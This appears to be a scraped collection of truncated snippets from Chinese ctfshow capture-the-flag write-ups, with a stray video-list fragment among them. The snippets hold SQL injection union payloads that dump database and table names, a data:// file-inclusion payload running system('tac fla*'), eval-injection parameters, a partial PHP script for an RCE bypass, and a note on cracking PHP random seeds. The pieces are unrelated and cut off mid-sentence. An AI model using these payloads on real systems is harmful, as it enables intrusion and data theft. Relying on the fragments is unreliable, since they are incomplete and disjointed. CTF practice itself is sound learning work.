由上可知:回显位为2所在位置 爆库:admin' or 1=1 union select 1,database(),3#可知数据库名为web2 爆表:admin' or '1'='1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database();#可知表名为flag,user 爆字段:admin' or '1'='1' union s...
(2)通过该随机数逆推出当前程序所使用的随机数种子(Web题为动态flag,此题种子根据flag来生成,每次创建题目实例都会变),此处使用一个根据随机数爆破种子的脚本php_mt_seed,该工具可以爆破出各个php版本下的随机数种子,推荐选择php版本7.0+的种子。 工具地址:https://github.com/Al1ex/php_mt_seed 首先进入脚本所...
直接F12然后Base64解码 ctfshow{19bdf375-f974-481e-8c62-0f4c3d170fb4} web2 考点:联合查询 先尝试使用万能密码登入‘ or 1=1#登入成功!! ’or 1=1 order by 3#输入4没回显说明只有三个字段 ' or1=1unionselect1,database(),3# 爆破数据库为web2 1. ' or 1=1 union select 1,(select tabl...
web73: 同上,扫描出来文件名为flagc.txt,但是可以直接include()包含 web74: 同上,扫描出来文件名为flagx.txt,但是可以直接include()包含 Web75: 过滤include; 法一:uaf strlen()函数被过滤,应该可以重写strlen()函数过滤 法二:用PDO连接数据库进行查询...
这个是web184,然后将数字改成true相加即可 还是会遇到一些很奇怪的问题;例如,跑代码时上传的talbeName能用,但是到网页端提交就不管用;又例如,flag开头应该是ctfshow,但是跑代码跑出来却是111ihw,实在有点不知道为什么。 这里贴一个代码,依旧是看着Y4大佬的代码改的,这里也将tableName的值输出来了,不过改了之后有...
CTF竞赛内容 不管是国内外,目前主流的CTF比赛内容主要涉及以下多个方面: Web 应用漏洞挖掘利用 Crypto 密码学 Pwn 程序的逻辑分析,漏洞利用windows、linux、小型机、固件设备等 Misc 杂项,隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据等 Reverse 二进制程序逆向,逆向windows、linux、移动设备类等 ...
附上hint的link地址ctfshow web入门 web41 <?php$myfile=fopen("rce_or.txt","w");$contents="";for($i=0;$i<256;$i++){for($j=0;$j<256;$j++){if($i<16){$hex_i='0'.dechex($i);}else{$hex_i=dechex($i);}if($j<16){$hex_j='0'.dechex($j);}else{$hex_j=dechex(...
7686 23 58:34 App CTFshow-web入门-信息收集 1万 67 8:26:45 App ctfshow-web入门-sql注入 5052 10 2:01:17 App ctfshow-技术分享第1期 898 -- 3:39 App ctfshow-web入门-信息搜集-web2 3046 4 5:45:03 App CTFshow-web入门-中期测评 670 1 6:02 App ctfshow-web入门-信息搜集-web17...
web37 if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ include($c); echo $flag; } } 利用函数:include() 绕过思路:文件包含常用攻击手法,伪协议读取文件内容 Payload1:?c=data:text/plain,<?=system("tac fla*");?> ...
?v1=1&v2=var_dump($ctfshow)/*&v3=*/;Web101(反射API)什么东西一大片,不会。求助hint和wp,得知php有个反射类(我对面向对象不是很熟悉)。反射,通俗来讲就是可以通过一个对象来获取所属类的具体内容,php中内置了强大的反射API:ReflectionClass:一个反射类,功能十分强大,内置了各种获取类信息的方法...